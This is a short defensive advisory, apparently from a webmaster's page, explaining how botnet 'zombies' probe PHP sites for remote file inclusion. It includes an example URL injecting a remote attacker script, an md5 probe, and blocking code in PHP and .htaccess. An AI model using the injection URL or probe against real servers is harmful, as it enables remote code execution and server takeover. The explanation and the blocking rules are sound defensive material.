What's going on ?

A Zombie network tries to add your Server
as a new Zombie for whatever reason.

It works like this:

In PHP, you may include external files
from the internet using e.g.

include 'http://www.example.com/file.php';

As soon as you (or your Content-Management System)
uses this together with special URL's,
You run into the following problem:

If 'someone' types an URL like e.g.
http://www.example.com/page.php?URL=http%3A%2F%2Fwww.xxx.com/....bad_page.php

the code from www.xxx.com/....bad_page.php
is executed on YOUR Server.

the Result of

<?php echo md5("just_a_test"); ?>

is "c6db3524fe71d6c576098805a07e79e4"

So What ?

If 'someone' is not a Person, but a Zombie Computer,
it will check out all possible cases to create
an access on the just_a_test page.

The MD5-Sum c6db3524fe71d6c576098805a07e79e4 apears now
somewhere on your page, and the Zombie knows that your
Server accepts external PHP scripts.


The Zombie will now send you another http-request

with PHP code that may infect Your Server.


In fact, they try to write a php-file to your server,
that allows an external Person to run ANY PHP-CODE
on your Server by simply upload a file.

What to do ?

If you do not use 'http:' within your URL's
Query_String you may simply add the following code
at the beginning of all of your PHP-Files:

<?
Header("X-Powered-by: safe_http");	//Hide PHP-Version
if(preg_match("/http:/i", urldecode(getenv("REQUEST_URI").getenv("QUERY_STRING"))))
	{
	Header( "HTTP/1.1 503 Service Unavailable" );
	exit;
	}
?>

Feedback

As an alternative, if you are able to change
your .htaccess file, you may create
a rewrite rule  403 FORBIDDEN there:

RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /------------http----------- [F,NC]
RewriteRule http: /---------http----------- [F,NC]